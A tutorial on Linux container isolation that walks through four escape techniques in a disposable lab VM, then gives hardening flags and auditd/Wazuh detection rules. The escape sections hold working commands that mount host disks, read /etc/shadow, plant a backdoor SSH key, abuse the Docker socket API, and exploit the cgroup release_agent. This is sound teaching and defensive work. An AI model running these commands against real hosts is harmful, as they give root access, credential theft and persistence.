Containers are the dominant deployment unit in modern infrastructure, and the security model behind them is widely misunderstood. The abstraction is clean — an isolated filesystem, process tree, and network stack — but underneath, a container is a set of kernel features applied to a regular Linux process. There is no hypervisor. There is no hardware boundary. Every container escape exploits the fact that the host kernel is shared.
This tutorial demonstrates four container escape techniques against deliberately misconfigured containers, then shows how to harden against each one. The goal is to build an accurate mental model of what containers actually isolate, where the boundaries are thin, and what configurations break them entirely.
How containers isolate
A container is not a VM. A virtual machine runs its own kernel on emulated (or virtualized) hardware. A container runs as a process on the host kernel, with isolation enforced by four kernel subsystems working together.
Virtual Machine Container
┌─────────────────────────┐ ┌─────────────────────────┐
│ Guest Userspace │ │ Container Process │
├─────────────────────────┤ │ (isolated view) │
│ Guest Kernel │ └────────────┬────────────┘
├─────────────────────────┤ │
│ Hypervisor │ ┌────────────┴────────────┐
├─────────────────────────┤ │ Namespaces │
│ Host Kernel │ │ Cgroups │
├─────────────────────────┤ │ Seccomp │
│ Host Hardware │ │ Capabilities │
└─────────────────────────┘ ├─────────────────────────┤
│ Host Kernel (shared) │
├─────────────────────────┤
│ Host Hardware │
└─────────────────────────┘
Namespaces give each container its own view of system resources. Linux supports eight namespace types (the eighth, the time namespace, arrived in kernel 5.6); the seven that matter for container isolation are:
| Namespace | Isolates | Effect |
|---|---|---|
| PID | Process IDs | Container sees only its own processes, PID 1 is the entrypoint |
| NET | Network stack | Container gets its own interfaces, routing table, iptables rules |
| MNT | Filesystem mounts | Container sees only its own mount tree |
| UTS | Hostname and domain | Container can set its own hostname |
| IPC | System V IPC, POSIX message queues | Shared memory segments are isolated |
| USER | User and group IDs | UID 0 inside can map to unprivileged UID on host |
| cgroup | Cgroup root view | Container sees only its own cgroup hierarchy |
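Namespace membership is visible directly in /proc: each namespace a process belongs to appears as a symlink under /proc/&lt;pid&gt;/ns, and two processes share a namespace exactly when those symlinks resolve to the same inode. A quick check (the inode number shown is illustrative):

```shell
# List this shell's namespace identities. Two processes are in the same
# namespace iff these symlinks resolve to the same <type>:[inode] value.
readlink /proc/self/ns/mnt   # e.g. mnt:[4026531841]
readlink /proc/self/ns/pid
readlink /proc/self/ns/net

# Comparing against PID 1 shows whether this shell shares namespaces with init.
# In a PID-namespaced container, /proc/1 is the container entrypoint instead.
readlink /proc/1/ns/mnt 2>/dev/null || echo "cannot read PID 1 namespaces"
```

Inside a container, comparing the container shell's values against the host's makes the isolation concrete: the inodes differ for every namespaced resource.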
Cgroups limit resource consumption. They prevent a container from exhausting host CPU, memory, I/O, or PIDs. Cgroups do not provide security isolation — they are a denial-of-service prevention mechanism. However, the cgroup filesystem itself can become an escape vector, as we’ll see. Cgroup v1 had a flat hierarchy with separate controllers (cpu, memory, blkio, etc.) each mounted independently. Cgroup v2 uses a unified hierarchy, which simplifies management and — critically for this tutorial — removes the release_agent mechanism that enabled one of the escape techniques we’ll demonstrate.
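Which hierarchy a given host runs can be checked with a one-liner; the filesystem type mounted at /sys/fs/cgroup tells the two apart:

```shell
# cgroup2fs -> unified v2 hierarchy (no release_agent mechanism)
# tmpfs     -> legacy/hybrid v1 layout (per-controller cgroup mounts,
#              each with its own release_agent at the hierarchy root)
stat -fc %T /sys/fs/cgroup
```

This is worth running in your lab VM before attempting Escape 4, since the release_agent technique only applies to the v1 layout.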
Seccomp (Secure Computing Mode) filters syscalls at the kernel level. A seccomp filter is a BPF program attached to a process that intercepts every syscall before it enters the kernel. The default Docker/Podman seccomp profile blocks roughly 44 of the 300+ syscalls on x86_64, including dangerous ones like mount, reboot, kexec_load, ptrace, and bpf. Disabling seccomp (or running privileged) removes this filter entirely, exposing the full syscall surface to the container process.
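You can confirm whether a filter is attached to any process by reading its status file; the Seccomp field reports the mode:

```shell
# Seccomp: 0 = disabled, 1 = strict mode, 2 = a BPF filter is attached.
# Inside a default Docker/Podman container this reports 2; in a container
# run with seccomp=unconfined (or --privileged) it reports 0.
grep '^Seccomp:' /proc/self/status
```

Checking this from inside a container is a fast way to tell whether the default syscall filter is actually in place.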
Linux capabilities split root’s monolithic power into ~41 discrete permissions. Instead of a binary root/non-root check, the kernel evaluates specific capabilities for each privileged operation. CAP_NET_BIND_SERVICE allows binding to ports below 1024. CAP_SYS_ADMIN allows mounting filesystems, configuring namespaces, and dozens of other operations (it’s the “catch-all” capability and the most dangerous). A default container gets a reduced set — typically CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_NET_BIND_SERVICE, and a handful of others. Running with --privileged grants all capabilities, disables seccomp, and gives device access, which is functionally equivalent to root on the host.
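Capability sets are exposed per process as hex bitmasks in /proc/&lt;pid&gt;/status, which makes for a quick check of how much of root’s power a process actually holds:

```shell
# CapEff is the effective capability set as a bitmask. With 41 capabilities
# defined, full root is 000001ffffffffff; a default container shows a much
# sparser mask, and an unprivileged process shows all zeroes.
grep '^CapEff:' /proc/self/status
```

A full 000001ffffffffff mask inside a container is the signature of --privileged (or an equivalent cap-add-everything configuration).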
Insight
The shared kernel boundary
Every escape in this tutorial exploits the same fundamental fact: the container and the host share a kernel. Namespaces control what a process can see. Capabilities and seccomp control what it can do. But if you grant enough capabilities or disable enough restrictions, the process can reach through those boundaries because the kernel doesn’t distinguish between “container root” and “host root” at the syscall level — it only checks capabilities.
Lab setup
This lab uses Podman to create deliberately vulnerable containers. Each container is configured with a specific misconfiguration that enables one escape technique.
Warning
Run this lab only in a disposable VM or test environment. These containers are intentionally misconfigured to allow full host compromise. Never run these configurations on production systems, shared machines, or any system with data you care about.
Create the lab setup script.
#!/bin/bash
# container-escape-lab.sh
# Starts four deliberately vulnerable containers for escape practice.
# ONLY run this in an isolated VM.
set -euo pipefail
LAB_NET="escape-lab"
IMAGE="docker.io/library/ubuntu:24.04"
echo "[*] Pulling base image..."
podman pull "$IMAGE"
echo "[*] Creating lab network..."
podman network create "$LAB_NET" 2>/dev/null || true
# Use a Docker-compatible API socket for Escape 2.
if [ -S /var/run/docker.sock ]; then
API_SOCK=/var/run/docker.sock
elif [ -S /run/podman/podman.sock ]; then
API_SOCK=/run/podman/podman.sock
elif [ -n "${XDG_RUNTIME_DIR:-}" ] && [ -S "${XDG_RUNTIME_DIR}/podman/podman.sock" ]; then
API_SOCK="${XDG_RUNTIME_DIR}/podman/podman.sock"
else
echo "[!] No Docker-compatible container API socket found."
echo "[!] Start Docker, or enable Podman socket:"
echo " systemctl enable --now podman.socket"
exit 1
fi
echo "[*] Using API socket: $API_SOCK"
echo "[*] Starting Escape 1: Privileged container"
podman run -d --name escape1-privileged \
--privileged \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo "[*] Starting Escape 2: Docker socket mount"
podman run -d --name escape2-socket \
-v "$API_SOCK:/var/run/docker.sock" \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo "[*] Starting Escape 3: Shared PID namespace"
podman run -d --name escape3-pidhost \
--pid=host \
--privileged \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo "[*] Starting Escape 4: Writable cgroup (cgroup v1)"
podman run -d --name escape4-cgroup \
--security-opt apparmor=unconfined \
--security-opt seccomp=unconfined \
--cap-add=SYS_ADMIN \
--cgroupns=host \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo ""
echo "[+] Lab containers running:"
podman ps --filter "network=$LAB_NET" --format "table {{.Names}}\t{{.Status}}"
echo ""
echo "[*] Enter a container with: podman exec -it <name> bash"
echo "[*] Tear down with: podman rm -f escape1-privileged escape2-socket escape3-pidhost escape4-cgroup"
Install tools inside each container as needed.
# For each container, install basic utilities
for c in escape1-privileged escape2-socket escape3-pidhost escape4-cgroup; do
podman exec "$c" apt-get update -qq
podman exec "$c" apt-get install -y -qq curl util-linux iproute2 procps libcap2-bin python3 openssh-client > /dev/null
done
Tip
If your test VM uses cgroup v2 only (most modern distros), Escape 4 won’t work as written. To test the cgroup release_agent technique, boot the VM with systemd.unified_cgroup_hierarchy=0 on the kernel command line to enable the hybrid or legacy cgroup hierarchy.
Escape 1: Privileged container to host filesystem
The --privileged flag is the most dangerous container configuration. It grants all Linux capabilities, disables seccomp, mounts all host devices into the container’s /dev, and removes AppArmor/SELinux confinement. It exists for cases like running Docker-in-Docker or accessing hardware directly — but it completely destroys the container security boundary.
Identifying a privileged container
Enter the container and check your capabilities.
podman exec -it escape1-privileged bash
Inside the container, list the current capabilities.
capsh --print | grep "Current:"
A privileged container returns a full bitmask. You’ll see every capability listed, including dangerous ones like CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_READ_SEARCH, and CAP_SYS_RAWIO.
Check for device access.
ls /dev/sda* /dev/vda* /dev/nvme* 2>/dev/null
In a normal container, /dev contains only a few virtual devices. In a privileged container, you’ll see the host’s actual block devices — the physical (or virtual) disks.
Mounting the host filesystem
Identify the host root partition. If your VM uses /dev/sda1 or /dev/vda1:
fdisk -l /dev/sda 2>/dev/null || fdisk -l /dev/vda 2>/dev/null
Mount the host root filesystem.
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host
You now have full read-write access to the host’s filesystem from inside the container.
# Read the host's shadow file
cat /mnt/host/etc/shadow
# List host users with login shells
grep -v nologin /mnt/host/etc/passwd
# Read the host's SSH keys
ls -la /mnt/host/root/.ssh/
cat /mnt/host/root/.ssh/authorized_keys
Writing persistent access
Add an SSH key to the host’s authorized_keys.
# Generate a key pair inside the container
ssh-keygen -t ed25519 -f /tmp/backdoor -N ""
# Write the public key to the host's authorized_keys
mkdir -p /mnt/host/root/.ssh
cat /tmp/backdoor.pub >> /mnt/host/root/.ssh/authorized_keys
chmod 600 /mnt/host/root/.ssh/authorized_keys
Full escape with nsenter
With --privileged, you can also use nsenter to enter the host’s namespaces directly. PID 1 on the host is always init (or systemd).
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
This drops you into a shell that is, for all practical purposes, running directly on the host as root. You’ve left the container entirely.
# Verify you're on the host
hostname
cat /etc/os-release
ps aux | head -20
Insight
Why --privileged exists
The --privileged flag was originally designed for running the Docker daemon inside a container (DinD) and for containers that need direct hardware access. In both cases, the container must operate with host-level privileges. The problem is that --privileged is often used as a shortcut for debugging permission issues, and it persists into production. Any container running with --privileged is not actually contained.
Escape 2: Docker socket mount
Mounting /var/run/docker.sock into a container is extremely common in CI/CD pipelines (Jenkins, GitLab CI), monitoring tools (cAdvisor, Datadog), and container management UIs (Portainer). The Docker socket is a Unix socket that provides full, unauthenticated access to the Docker API. Access to this socket is equivalent to root on the host.
The Docker API attack
Enter the container.
podman exec -it escape2-socket bash
Verify the socket is available.
ls -la /var/run/docker.sock
You don’t need the Docker CLI to exploit this. The Docker API speaks HTTP over the Unix socket, and curl can talk to Unix sockets directly.
List running containers via the API.
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | \
python3 -c "import sys,json; [print(c['Names'][0], c['Image']) for c in json.load(sys.stdin)]"
Creating an escape container
Create a new container via the API that mounts the host root filesystem.
# Create the container
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/create?name=escape-host \
-H "Content-Type: application/json" \
-d '{
"Image": "ubuntu:24.04",
"Cmd": ["/bin/bash"],
"Tty": true,
"OpenStdin": true,
"HostConfig": {
"Binds": ["/:/hostfs"],
"Privileged": true
}
}'
# Start it
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/escape-host/start
Now attach to the new container — or more practically, use the exec endpoint to run commands.
# Execute a command in the escape container to read host files
# First, create the exec instance
EXEC_ID=$(curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/escape-host/exec \
-H "Content-Type: application/json" \
-d '{"Cmd":["cat","/hostfs/etc/shadow"],"AttachStdout":true}' | \
python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")
# Then start it
curl -s --unix-socket /var/run/docker.sock \
-X POST "http://localhost/exec/${EXEC_ID}/start" \
-H "Content-Type: application/json" \
-d '{"Detach":false}'
This returns the contents of the host’s /etc/shadow, demonstrating full host filesystem access through a container that only had the Docker socket mounted.
The broader implication
The Docker socket grants the ability to:
- Create privileged containers with host volume mounts
- Execute arbitrary commands on the host via new containers
- Read and write any file on the host filesystem
- Modify running containers and images
- Stop or remove other containers (denial of service)
Warning
“Read-only” Docker socket mounts (-v /var/run/docker.sock:/var/run/docker.sock:ro) do not help. The :ro flag prevents the container from deleting or replacing the socket file. It does nothing to restrict the API calls made through the socket. The API itself has no read-only mode.
Escape 3: Namespace escape via nsenter
When a container runs with --pid=host, the PID namespace isolation is removed. The container process can see every process on the host. Combined with sufficient capabilities (which --privileged provides), this allows direct entry into the host’s namespaces.
Seeing host processes
Enter the container.
podman exec -it escape3-pidhost bash
List processes. You’ll see the full host process tree, not just the container’s processes.
ps aux
You’ll see systemd (PID 1), kernel threads, SSH daemons, the container runtime, and everything else running on the host. In a properly namespaced container, ps aux would only show the container’s entrypoint process and its children.
Entering the host namespaces
Each process on Linux has a set of namespace references in /proc/<pid>/ns/. When you can see host PID 1, you can enter its namespaces.
ls -la /proc/1/ns/
Use nsenter to enter all of PID 1’s namespaces.
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
Each flag enters a specific namespace of the target process:
| Flag | Namespace | Effect |
|---|---|---|
| --mount | MNT | See the host’s filesystem mounts |
| --uts | UTS | See the host’s hostname |
| --ipc | IPC | Access the host’s shared memory |
| --net | NET | Use the host’s network stack |
| --pid | PID | See the host’s process tree |
After nsenter, you’re operating in the host’s context. Verify it.
hostname
mount | head -10
ip addr
cat /etc/hostname
Why --pid=host is used
The --pid=host flag is typically used for debugging and monitoring containers — tools that need to observe host processes. It’s sometimes combined with --privileged for troubleshooting. The combination of both flags is functionally equivalent to running directly on the host.
Tip
If you only need process visibility for monitoring (e.g., running htop or a metrics exporter), consider using /proc from a mounted host path instead of sharing the PID namespace. This provides read-only visibility without enabling namespace traversal.
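As a sketch of that approach (the exporter image and its flag are hypothetical stand-ins, not a real tool), bind-mount the host’s /proc read-only instead of sharing the PID namespace:

```shell
# Hypothetical monitoring container: it can read host process information
# from /host/proc, but it keeps its own PID namespace, so nsenter-style
# traversal into host processes is not possible.
podman run -d --name metrics-exporter \
  -v /proc:/host/proc:ro \
  --cap-drop=ALL \
  --user 1000:1000 \
  example/exporter:latest --procfs=/host/proc   # flag name is illustrative
```

The exporter gets the visibility it needs while the kernel still enforces every namespace boundary around it.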
Escape 4: cgroup release_agent (CVE-2022-0492)
This escape is more subtle than the previous three. It doesn’t require --privileged or a mounted socket — just CAP_SYS_ADMIN and the ability to write to the cgroup filesystem. It exploits the release_agent mechanism in cgroup v1.
How cgroup release_agent works
In cgroup v1, each cgroup hierarchy has a release_agent file at its root. When a cgroup has notify_on_release set to 1 and the last process in that cgroup exits, the kernel executes the program specified in release_agent — and it executes it on the host, outside any container namespace.
┌─────────────────────────────────────────────┐
│ Container │
│ │
│ 1. Create child cgroup │
│ 2. Set notify_on_release = 1 │
│ 3. Write host path to release_agent │
│ 4. Put a process in the child cgroup │
│ 5. Kill the process (last one exits) │
│ │
└──────────────────────┬──────────────────────┘
│ cgroup event
▼
┌─────────────────────────────────────────────┐
│ Host Kernel │
│ │
│ Kernel executes release_agent script │
│ → runs ON THE HOST, as root │
│ → outside all container namespaces │
│ │
└─────────────────────────────────────────────┘
Executing the escape
Enter the container.
podman exec -it escape4-cgroup bash
First, find the container’s location on the host filesystem. The container’s filesystem is visible from the host at a path we can discover from the overlay mount entry in /proc/1/mountinfo.
# Find the cgroup mount point
mount | grep cgroup
Identify the cgroup path for this container and the writable hierarchy.
# Find a writable cgroup hierarchy
# In cgroup v1, RDMA or other hierarchies may be writable
CGROUP_MOUNT=$(mount | grep "cgroup " | head -1 | awk '{print $3}')
echo "Cgroup mount: $CGROUP_MOUNT"
Now determine the host path to the container’s filesystem. This is needed because the release_agent script will execute on the host, so it needs a path the host kernel can resolve.
# Get the host path to the container's filesystem
# This is available via /proc/1/mountinfo
HOST_PATH=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /proc/1/mountinfo | head -1)
if [ -z "$HOST_PATH" ]; then
echo "Could not resolve host overlay path from /proc/1/mountinfo"
exit 1
fi
echo "Host path: $HOST_PATH"
Create the exploit.
# Create the payload script in the container rootfs.
# The host sees it at $HOST_PATH/cmd.sh.
CONTAINER_SCRIPT="/cmd.sh"
CONTAINER_OUTPUT="/output_from_host"
HOST_SCRIPT="$HOST_PATH/cmd.sh"
cat > "$CONTAINER_SCRIPT" << 'INNEREOF'
#!/bin/sh
ps aux > /output_from_host
cat /etc/hostname >> /output_from_host
id >> /output_from_host
INNEREOF
chmod +x "$CONTAINER_SCRIPT"
# Create a child cgroup
mkdir -p "$CGROUP_MOUNT/escape"
# Set notify_on_release
echo 1 > "$CGROUP_MOUNT/escape/notify_on_release"
# Set the release_agent to our script (using the host-visible path)
echo "$HOST_SCRIPT" > "$CGROUP_MOUNT/release_agent"
# Trigger: put a process in the child cgroup, then let it exit
sh -c "echo \$\$ > $CGROUP_MOUNT/escape/cgroup.procs && sleep 0.1"
After the sh process exits, it’s the last process in the escape cgroup. The kernel invokes the release_agent on the host.
# Check the output (give it a moment)
sleep 1
cat "$CONTAINER_OUTPUT"
If successful, you’ll see the host’s process list, hostname, and uid=0(root) — proof that the script executed on the host as root.
Requirements and limitations
This escape requires a specific combination of conditions:
- cgroup v1: The release_agent mechanism doesn’t exist in cgroup v2. Most modern distributions default to cgroup v2.
- CAP_SYS_ADMIN: Needed to mount cgroup filesystems and write to release_agent.
- Host cgroup namespace or writable cgroup: The container must be able to write to the cgroup hierarchy root, which requires --cgroupns=host or equivalent.
- No AppArmor/SELinux: Mandatory access control policies can block writes to cgroup files.
CVE-2022-0492 addressed the specific kernel bug where unprivileged users within a user namespace could write to release_agent, but the underlying mechanism still works when CAP_SYS_ADMIN is explicitly granted.
Insight
The cgroup escape pattern
This technique is notable because it uses a legitimate kernel feature as designed. The release_agent was intended for cleanup tasks when a cgroup becomes empty. The kernel correctly executes the specified program when the last process exits. The vulnerability isn’t a bug in the traditional sense — it’s a feature that was never designed with container isolation in mind, operating on a kernel subsystem that predates containers by years.
Secure container configuration
Each escape exploited a specific misconfiguration. Here’s the defense for each one, and at the end, a single hardened container command that applies all protections simultaneously.
Defense against Escape 1: Drop capabilities
Never use --privileged. Instead, drop all capabilities and add back only what the application needs.
podman run -d --name hardened-app \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
my-app:latest
The --cap-drop=ALL removes every capability. --cap-add selectively restores only what’s required. Most applications need at most two or three capabilities. If you don’t know which ones your application needs, run it with all capabilities dropped and add back whichever ones the error messages indicate are missing.
Defense against Escape 2: Never mount the Docker socket
There is no safe way to mount the Docker socket into a container. Any access to the socket is full API access.
For CI/CD pipelines that need to build container images, use alternatives:
- Kaniko: Builds container images in userspace without a Docker daemon
- Buildah: Builds OCI images without requiring a daemon socket
- Podman: Daemonless container management; no socket to mount
For monitoring tools that need container metadata, use the read-only container API endpoints via a proxy that restricts which API calls are allowed.
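One concrete pattern for that proxy (sketched here with the community tecnativa/docker-socket-proxy image; verify the current variable names against its documentation) is to let only the proxy touch the real socket:

```shell
# Only the proxy container mounts the real socket. CONTAINERS=1 permits
# GET requests against /containers; POST=0 denies all write operations,
# so a compromised monitoring tool cannot create or exec into containers.
podman run -d --name socket-proxy \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -e CONTAINERS=1 \
  -e POST=0 \
  -p 127.0.0.1:2375:2375 \
  docker.io/tecnativa/docker-socket-proxy:latest

# Monitoring tools then point at the proxy instead of the socket:
#   DOCKER_HOST=tcp://127.0.0.1:2375
```

The proxy itself still holds full socket access, so treat it as a sensitive component — but the blast radius of the monitoring container shrinks to read-only metadata.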
Defense against Escape 3: Isolate PID namespace
Never use --pid=host in production. The default (a private PID namespace per container) is correct for almost all workloads.
# Explicitly set (this is the default, but making it explicit prevents accidents)
podman run -d --pid=private my-app:latest
Defense against Escape 4: Restrict cgroup access
Don’t grant CAP_SYS_ADMIN unless absolutely necessary. Use cgroup v2 (which doesn’t have the release_agent mechanism). Keep containers in their own cgroup namespace.
# Ensure containers use their own cgroup namespace (default in modern Podman)
podman run -d --cgroupns=private my-app:latest
Defense in depth: The hardened run command
Apply all defenses simultaneously.
podman run -d --name production-app \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=64m \
--security-opt=no-new-privileges \
--security-opt seccomp=/etc/containers/seccomp.json \
--pids-limit=256 \
--memory=512m \
--cpus=1 \
--pid=private \
--cgroupns=private \
--network=slirp4netns \
--user 1000:1000 \
my-app:latest
Breaking this down:
| Flag | Defense |
|---|---|
| --cap-drop=ALL --cap-add=NET_BIND_SERVICE | Minimal capabilities |
| --read-only | Immutable rootfs prevents writing exploit scripts |
| --tmpfs /tmp:rw,noexec,nosuid,size=64m | Writable temp with noexec, so scripts can’t be executed from /tmp |
| --security-opt=no-new-privileges | Prevents suid binaries from gaining privileges |
| --security-opt seccomp=... | Custom seccomp profile blocks dangerous syscalls |
| --pids-limit=256 | Prevents fork bombs |
| --memory=512m --cpus=1 | Resource limits prevent host starvation |
| --pid=private | Own PID namespace |
| --cgroupns=private | Own cgroup namespace |
| --network=slirp4netns | Rootless networking (no CAP_NET_ADMIN needed) |
| --user 1000:1000 | Non-root user inside the container |
Tip
Rootless Podman as a baseline
Running Podman rootless (as a non-root user) applies user namespace mapping automatically. Root inside the container maps to your unprivileged UID on the host. Even if an attacker escapes the container, they land as an unprivileged user. This single change mitigates the majority of container escape techniques because most escapes require true host root privileges to be useful.
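The mapping itself is readable from /proc; each uid_map line is <first ID inside the namespace> <first ID on the host> <range length>:

```shell
# On the host (no user namespace) this prints the identity map:
#   0          0 4294967295
# Inside a rootless Podman container, the first line instead maps container
# UID 0 to your unprivileged host UID, with subordinate UIDs following.
cat /proc/self/uid_map
```

Running this inside a rootless container is the quickest way to confirm that “root” in the container is not root on the host.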
Seccomp profile hardening
The default seccomp profile is a good start, but you can tighten it further. Generate a profile specific to your application by tracing its syscalls, then locking down the allowlist.
# Trace syscalls your application uses during a test run
podman run --rm --security-opt seccomp=unconfined \
--annotation io.containers.trace-syscall="of:/tmp/seccomp-profile.json" \
my-app:latest /run-test-suite.sh
# Use the generated profile
podman run -d \
--security-opt seccomp=/tmp/seccomp-profile.json \
my-app:latest
This produces a minimal seccomp profile that allows only the syscalls your application actually uses during testing.
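The generated file follows the OCI seccomp profile format: a default deny action plus an explicit allowlist. A trimmed sketch of the shape (the syscall names here are illustrative, not a profile to deploy):

```json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64"],
  "syscalls": [
    {
      "names": ["read", "write", "openat", "close", "fstat", "mmap", "exit_group"],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
```

Any syscall not in the allowlist fails with an error instead of reaching the kernel, so run your full test suite while tracing or the profile will break untested code paths in production.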
Detection
Hardening prevents escapes, but defense in depth requires detection as well. The following rules cover auditd (host-level syscall auditing) and Wazuh (SIEM correlation and alerting) for each escape vector.
Detecting mount syscalls from containers
Escape 1 uses mount to attach host block devices. Container processes should almost never call mount.
Auditd rule:
# /etc/audit/rules.d/container-mount.rules
# Watch for mount syscalls from processes in non-root mount namespaces
-a always,exit -F arch=b64 -S mount -S umount2 -F auid>=1000 -F key=container_mount
-a always,exit -F arch=b64 -S mount -S umount2 -F exe=/usr/bin/nsenter -F key=container_mount
Wazuh rule to alert on the auditd events:
<group name="container_escape,">
<rule id="100410" level="12">
<if_sid>80700</if_sid>
<field name="audit.key">container_mount</field>
<description>Mount syscall detected from container context — possible container escape attempt.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
</group>
Detecting Docker socket access
Escape 2 communicates with the Docker socket from inside a container. Monitor access to the socket.
Auditd rule:
# /etc/audit/rules.d/docker-socket.rules
# Watch for access to the Docker socket
-w /var/run/docker.sock -p rwa -k docker_socket_access
Wazuh rule:
<group name="container_escape,">
<rule id="100411" level="10">
<if_sid>80700</if_sid>
<field name="audit.key">docker_socket_access</field>
<description>Docker socket accessed — check if source process is authorized.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,</group>
</rule>
<!-- Higher severity when curl or wget accesses the socket -->
<rule id="100412" level="14">
<if_sid>100411</if_sid>
<field name="audit.exe">(curl|wget|python)</field>
<description>Docker socket accessed by unusual process — likely container escape via API abuse.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
</group>
Detecting nsenter usage
Escapes 1 and 3 use nsenter to cross namespace boundaries. This binary should rarely be executed in production.
Auditd rule:
# /etc/audit/rules.d/nsenter.rules
# Watch for nsenter execution
-w /usr/bin/nsenter -p x -k nsenter_execution
Wazuh rule:
<group name="container_escape,">
<rule id="100413" level="13">
<if_sid>80700</if_sid>
<field name="audit.key">nsenter_execution</field>
<description>nsenter executed — possible namespace escape from container.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
</group>
Detecting cgroup release_agent modification
Escape 4 writes to the release_agent file. This file should never be modified by container processes.
Auditd rule:
# /etc/audit/rules.d/cgroup-release-agent.rules
# Watch for writes to any release_agent file in cgroup hierarchies
-w /sys/fs/cgroup/ -p wa -k cgroup_modification
Wazuh rule:
<group name="container_escape,">
<rule id="100414" level="14">
<if_sid>80700</if_sid>
<field name="audit.key">cgroup_modification</field>
<match>release_agent</match>
<description>cgroup release_agent modified — possible CVE-2022-0492 container escape.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
<rule id="100415" level="12">
<if_sid>80700</if_sid>
<field name="audit.key">cgroup_modification</field>
<match>notify_on_release</match>
<description>cgroup notify_on_release modified — possible setup for cgroup escape.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,</group>
</rule>
</group>
Centralized alert dashboard
With these rules deployed, Wazuh will generate alerts at levels 10-14 for container escape activity. A practical alert strategy:
| Alert Level | Escape Vector | Response |
|---|---|---|
| 14 | Docker socket + unusual process | Immediate investigation |
| 14 | cgroup release_agent write | Immediate investigation |
| 13 | nsenter execution | Investigate within 15 minutes |
| 12 | Mount syscall from container | Investigate within 1 hour |
| 10 | Docker socket access | Review daily |
Tip
Reduce noise with context
The auditd rules above will generate events for legitimate container operations too (e.g., the container runtime itself calls mount). To reduce false positives, add -F exe!=/usr/bin/runc and similar exclusions for your container runtime. The Wazuh rules can use <if_sid> chains to require multiple suspicious behaviors before alerting at high severity.
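As a sketch, the mount rule from earlier could be narrowed like this (the binary path is illustrative; check where your runtime actually lives — runc, crun, /usr/sbin, etc. — before deploying):

```
# /etc/audit/rules.d/container-mount.rules (narrowed sketch)
# The exe!= field excludes the container runtime itself, so only mount
# syscalls from other binaries generate container_mount events.
-a always,exit -F arch=b64 -S mount -S umount2 -F exe!=/usr/bin/runc -F auid>=1000 -F key=container_mount
```

Add one analogous exclusion per runtime binary on the host, and re-test with a legitimate container start to confirm the baseline noise is gone.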
Where to go from here
This tutorial covered four escape techniques against specific misconfigurations. The container escape landscape is broader than this — other vectors include kernel exploits (CVE-2022-0847 Dirty Pipe, CVE-2016-5195 Dirty COW), container runtime vulnerabilities (CVE-2019-5736 allowed overwriting the host runc binary from within a container), image supply chain attacks (malicious base images, compromised registries), and cloud metadata service abuse from within containers (SSRF to 169.254.169.254 to steal IAM credentials). Each of those deserves its own treatment.
For production environments, consider these additional layers beyond what this tutorial covered:
- gVisor or Kata Containers: These provide a stronger isolation boundary. gVisor intercepts syscalls with a user-space kernel, reducing the host kernel’s attack surface. Kata Containers run each container in a lightweight VM, providing hardware-level isolation while maintaining container ergonomics.
- Pod Security Standards: Kubernetes provides three built-in policy levels (Privileged, Baseline, Restricted) that enforce many of the hardening measures covered here at the cluster level, preventing misconfigured containers from being deployed in the first place.
- Runtime security tools: Falco, Tracee, and Tetragon can detect escape attempts in real time by monitoring syscalls, file access patterns, and network activity from eBPF hooks, providing deeper visibility than auditd alone.
The key takeaway is structural: containers provide process-level isolation, not machine-level isolation. Every configuration flag you set either strengthens or weakens that boundary. Start from the hardened baseline, grant only what’s necessary, monitor for the specific syscalls and file accesses that indicate boundary violations, and treat any container with --privileged or a mounted Docker socket as equivalent to root on the host — because it is.